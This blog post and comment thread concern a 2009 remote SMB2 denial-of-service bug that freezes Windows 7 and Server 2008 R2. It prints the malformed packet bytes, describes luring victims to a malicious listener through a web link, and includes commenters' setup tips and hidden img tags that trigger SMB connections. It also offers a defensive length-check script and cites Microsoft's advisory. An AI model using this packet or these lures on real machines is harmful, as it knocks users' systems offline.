Remote SMB Exploit: Crashing Windows 7 and Server 2008

pc_guy

Python code was posted today by Laurent Gaffie on his blog, demonstrating a much too easy way to remotely crash a Windows 7 or Windows Server 2008 machine. The crash is caused by sending a NetBIOS header which specifies that the SMB packet is 4 bytes smaller or larger than it actually is.

In the code sample below, you can see that the NetBIOS header has the length of the packet set to 9a rather than 9e (4 bytes smaller). Update: We have tested with different variations, such as 1 byte and 2 bytes off, which also caused the crash.

packet = (
    b"\x00\x00\x00\x9a"  # NetBIOS header: length field says 0x9a, but the SMB2 body below is 0x9e bytes
    b"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"  # SMB2 header: \xfeSMB, StructureSize 64
    b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
    b"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
    b"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
    b"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
    b"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
    b"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
)  # parenthesised so the adjacent literals concatenate into one bytes object (0x9e bytes after the 4-byte header)

We also tested this by setting 9e to aa (4 bytes larger) to see if it had the same effect, and indeed it did.
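As an added example (not from the original post or from Laurent's code), here is the framing check an SMB client or a passive network monitor should make before it touches a single SMB2 field: compare the 24-bit length in the NetBIOS session header with the bytes actually present. It assumes only the NetBIOS session-service header layout (one type byte plus a big-endian 3-byte length) and uses a constructed 0x9e-byte body of the same size as the packet above; the helper names are my own.

```python
from typing import NamedTuple, Optional

SMB2_MAGIC = b"\xfeSMB"   # every SMB2 header starts with these four bytes
SMB2_HEADER_LEN = 64      # fixed size of the SMB2 header

class Verdict(NamedTuple):
    ok: bool
    reason: str
    declared: int   # length claimed by the NetBIOS header
    actual: int     # bytes actually present after the header

def netbios_frame(body: bytes, declared: Optional[int] = None) -> bytes:
    """Prepend a NetBIOS session-service header (type byte 0x00 plus a
    24-bit big-endian length) to an SMB2 body. Passing declared overrides
    the length field, which is how the post's malformed packet is built."""
    length = len(body) if declared is None else declared
    return b"\x00" + length.to_bytes(3, "big") + body

def check_frame(data: bytes) -> Verdict:
    """Validate the framing before any SMB2 field is parsed."""
    if len(data) < 4:
        return Verdict(False, "truncated NetBIOS header", 0, len(data))
    if data[0] != 0x00:
        return Verdict(False, "not a session message", 0, len(data) - 4)
    declared = int.from_bytes(data[1:4], "big")
    actual = len(data) - 4
    if declared != actual:
        # This is the condition the post triggers (0x9a or 0xaa instead of 0x9e).
        return Verdict(False, "length mismatch", declared, actual)
    if actual < SMB2_HEADER_LEN or data[4:8] != SMB2_MAGIC:
        return Verdict(False, "body is not a full SMB2 header", declared, actual)
    return Verdict(True, "ok", declared, actual)

# Constructed sample body: 0x9e bytes, the same size as the packet in the post.
BODY = SMB2_MAGIC + bytes(0x9e - 4)

if __name__ == "__main__":
    for declared in (None, 0x9a, 0xaa, 0x9d):
        print(hex(declared) if declared else "correct", check_frame(netbios_frame(BODY, declared)))
```

A monitor that logs every "length mismatch" verdict on port 445 gives you a detection for this class of malformed frame regardless of which offset is used.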

A little about the “crash”. The Operating System actually freezes. There is no error message, no blue screen of death, no indication that anything has gone wrong. Even after power cycling, the event logs show no sign of a mishap, aside from the typical events generated from booting up again.

Demonstration

Our victim targets are:

  1. A Windows 7 Professional workstation with latest patches.
  2. A Windows Server 2008 R2 Standard Core Edition with latest patches.

On OpenBSD, Mac OS X, and Linux 2.6 workstations, we ran the Python code and had it listen on port 445. I would have had a Windows server run the listening server, but SMB on Windows already listens on port 445, and for the purpose of the demonstration it was easier to run it on machines that do not listen on this port by default. From the Windows 7 and Windows Server 2008 victim machines, we simply attempt any type of SMB connection to the bad hosts listening with the Python code. This can be done by simply issuing a directory command (dir) against a non-existent share (dir \\ip-address\share).

The screenshot below shows the command window with the dir command used to attempt a connection to a host (172.17.20.139) running the Python code, ready to send that SMB packet over. As soon as the connection is attempted, the whole machine freezes. I had Resource Monitor and Task Manager running, and every counter, even the ticking of uptime, stopped dead. In some cases, I left the machine in this state for a significant amount of time. Also, the host was no longer pingable, so once the crash occurred, it was off the network and no longer attempting any more SMB traffic.

What is the big deal?

To simulate how an attacker could use this, we hosted a small internal web page with a simple link to direct the user to our malicious host. While our link, as seen in the image below, was very obvious for demonstration purposes, users can be redirected in various obfuscated ways. Although remote elevated privileges or sensitive data theft is not part of this proof of concept, this can still be a very troublesome issue.


Update

Microsoft says this is being investigated as a possible denial of service vulnerability, but initially responded that correcting it will be handled in the first service pack updates for Windows 7 and Server 2008 R2 rather than as a "Patch Tuesday" security update.

Microsoft has posted a security advisory (977544) regarding the issue.

Filed Under: Remote Exploit, Windows


Comments (25)


  1. MS_Guy says:

    This is typical of the bash MS crowd! And why would you surf the net from a production server anyway! Oh the sky is falling, the sky is falling!

  2. n0neXn0ne says:

    “And why would you surf the net from a production server anyway!”

    To download patches on Tuesday!

    ^o^

  3. Simon Price says:

    To MS_GUY: I have been a big proponent of Windows 7, having used it since early betas (2008 as well, see my post on using the CLI in Core edition). I was sad to have to write this post, however, this is a pretty significant miss in testing on Microsoft’s part. You likely would not surf from Windows 2008, but you would indeed from Windows 7. For enterprise environments, the lesson here is to keep tight EGRESS rules as well, blocking everything outbound except the essentials (HTTP, HTTPS). The lesson for me is not to tout how wonderful the OS is until the first SP is released. :)

  4. Sebastian says:

    I tried it and didn’t work.

    Is it something special that has to be enabled in either win 7/2k8r2?

  5. Simon Price says:

    Sebastian: Nothing special has to be enabled; the default installation is prone to the crash. Note that the full code is on Laurent’s site, but if you do a cut and paste from there, you may have to fix some of the tabs (Python cares about the tabbing). Ensure that the line def handle is indented, and the five lines under that indented twice. The last two lines are not indented. Also, the code must run on a machine that does not have port 445 in use, so if you run the server on Windows, you have to stop the Server service and disable NetBIOS. Once you attempt to connect with ‘dir’ as mentioned in the post, complete freeze.

  6. [...] The SMB vulnerability already discussed at the beginning of September has been confirmed on the release builds of Windows 7 and Server 2008 R2. See more here and here. [...]

  7. [...] this exploit; interested folks can find more by Simon Price in his Praetorian Prefect post here or in this post in the SANS Diary by Rob [...]

  8. [...] as soon as I have time, but I will start by pointing you to a few sources: the discoverer's detailed write-up, the test, the ZDNet article, Microsoft's advisory. Close TCP ports 135 through 139 and the [...]

  9. [...] Crash, as it is called. Here is the explanation from the discoverer G.Laurent, while on the Praetorian Perfect site you can find an explanation of how to freeze a machine remotely. Here, in technical jargon, [...]

  10. nckuhuahua says:

    You can simply place a

    image

  11. nckuhuahua says:

    You can simply place a

    image

    <img alt="" src="\\ip-address\1.png" height="1" width="1">

    <img alt="" src="file://///ip-address/1.png" height="1" width="1">

  12. nckuhuahua says:

    That is

    <img alt="" src="\\ip-address\1.png" height="1" width="1">

    <img alt="" src="file://///ip-address/1.png" height="1" width="1">

  13. [...] different from the real one. A single byte of difference is enough, according to PraetorianPrefect.com's tests. If it happens, the only thing you can do is press the computer's power button [...]

  16. [...] length different from the real one. A single byte of difference is enough, according to PraetorianPrefect.com's tests. If it happens, the only thing you can do is press the computer's power button and then [...]

  17. [...] on those items, but I haven’t thought of a reason to use them yet. Maybe we can convert Gaffie’s Python code that crashes Windows 7 into a Powershell script one [...]

  19. [...] can crash Windows 7 and Server 2008 R2 will not be patched in January’s patch Tuesday. We have shown how this bug can cause a severe halt to the OS, however, Microsoft stated that they “are not [...]

  20. [...] announced in a blog post that the SMB bug which can crash Windows 7 and Server 2008 R2 will not be patched in January’s patch Tuesday. We have shown how this bug can cause a severe [...]

  22. [...] Remote SMB Exploit: Crashing Windows 7 and server 2008 – praetorianprefect.com [...]

  23. [...] Back on November 11th, 2009 we confirmed Laurent Gaffié’s remote exploit for Windows that causes a kernel crash. The operating system actually freezes creating a denial of service when, for example, a user is tricked into clicking on a link on a web page to a malicious SMB share request. The SMB client goes into an infinite loop when processing this malformed request according to Microsoft. The video below demonstrates this effect, having a user click a web site link and showing the crash. [...]